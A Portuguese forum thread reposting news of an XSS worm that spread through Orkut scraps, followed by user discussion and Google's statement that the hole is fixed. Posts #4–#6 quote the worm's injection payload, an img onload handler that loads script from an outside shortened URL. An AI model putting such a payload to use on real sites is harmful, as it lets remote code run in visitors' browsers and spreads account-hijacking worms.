Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Bug no Orkut atinge pelo menos 180 mil usuários.

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Bug no Orkut atinge pelo menos 180 mil usuários.

    Uma falha no código do Orkut fez com que mais de 180 mil usuários fossem infectados com um bug que impede o uso da rede social. O problema ocorre na página de recados que, ao ao ser visualizada, leva automaticamente para uma comunidade "Infectados pelo Vírus do Orkut".

    A falha ocorre no processamento das mensagens dos usuários que permite que hackers insiram um código JavaScript, tornando a pessoa um membro da comunidade. Ao entrar nos "scraps", como são chamadas as mensagens da rede social", além de ser levado para a página "Infectados pelo Vírus do Orkut", o usuário passa o "bug" automaticamente para os amigos.

    Como todos os afetados pela falha se tornam membros da comunidade, a página, criada neste sábado, já possui mais de 180 mil membros. De acordo com Altieres Rohr, colunista de segurança para o PC do G1, o bug se tornou público na noite desta sexta-feira (24). "O Google foi avisado do problema por volta das 22h40 e ainda não tomou uma ação", conta.

    O problema prejudica apenas o uso da rede social e não existe o risco do problema se espalhar para o computador como um vírus. O colunista explica que basta os usuários não acessarem as páginas de mensagens dos amigos até o problema ser resolvido ára evitar ser atingido pelo bug.

    Na comunidade "Infectados pelo Vírus do Orkut", o usuário da rede social Rodrigo Lacerda assume a autoria do Bug. "Você chegou aqui através de uma falha grave no orkut. A falha já foi comunicada ao Google e deve ser corrigida em breve. A comunidade só tem o intuito de forçar uma correção mais rápida", explica Lacerda na comunidade.

    Até o momento, o Google não se manifestou sobre o problema.

    Fonte: G1.Globo.com
    "O único lugar onde sucesso vem antes do trabalho é no dicionário" Albert Einstein.
    Similar Threads

  • Font Size
    #2
    Mano,

    Uma amiga, enviou isso para min! Mais só que meu Av, detectou e recusou a URL infectada.
    Andei olhando todas a minhas comunidades, e não encotrei essa! Tmb estou entrando normalmente pelo orkut. Sera q estou infectado? Acho q não, né?

    Comment


    • Font Size
      #3
      Se vc estava infectado já não está mais.

      O Google informa que corrigiu o problema no Orkut:

      "Tomamos medidas rápidas para corrigir uma vulnerabilidade do tipo cross-site scripting (XSS) no orkut.com que foi descoberta algumas horas atrás. Nossa análise do código de script não revelou qualquer atividade maliciosa. O problema agora já está resolvido, mas continuamos estudando a vulnerabilidade para ajudar a evitar problemas semelhantes no futuro."

      fonte: google discovery
      "O único lugar onde sucesso vem antes do trabalho é no dicionário" Albert Einstein.

      Comment


      • Font Size
        #4
        O Código é Simples:

        Código PHP:

        <img src="bandeira.gif" Onload="d=documents;s=d.createElement('script');s.src='http://is.gd/fsznk##'; d.body.appendChild(s)";> 
        JavaScript Owns Google \m/
        Um dia saio dessa merda... Governo só gosta de vagabundos!

        Comment


        • Font Size
          #5
          Postado Originalmente por V4g_Br4Ck3r Ver Post
          O Código é Simples:

          Código PHP:

          <img src="bandeira.gif" Onload="d=documents;s=d.createElement('script');s.src='http://is.gd/fsznk##'; d.body.appendChild(s)";> 
          JavaScript Owns Google \m/
          Na verdade isso chama o JS e pega a bandeirinha hospedada no próprio servidor do orkut, se perceber o src está com um link camuflado. O worm em js foi feito pelo Rodrigo Lacerda. Eu tenho o JS decryptado aqui, mas agora não funciona mais.
          A simples falha era a aceitação de HTML no orkut, no status e no Quem sou eu.

          []'
          Mesmo longe, eu estou perto. Guia do Hacker 4ever.

          Comment


          • Font Size
            #6
            Postado Originalmente por #Expl0it Ver Post
            Na verdade isso chama o JS e pega a bandeirinha hospedada no próprio servidor do orkut, se perceber o src está com um link camuflado. O worm em js foi feito pelo Rodrigo Lacerda. Eu tenho o JS decryptado aqui, mas agora não funciona mais.
            A simples falha era a aceitação de HTML no orkut, no status e no Quem sou eu.

            []'
            Aham, esse ae postava a bandeirinha no status/nick...

            E tem esse link tbm, que você comentou:
            http://is.gd/fsznk##

            Um dia saio dessa merda... Governo só gosta de vagabundos!

            Comment

            X
            Working...
            X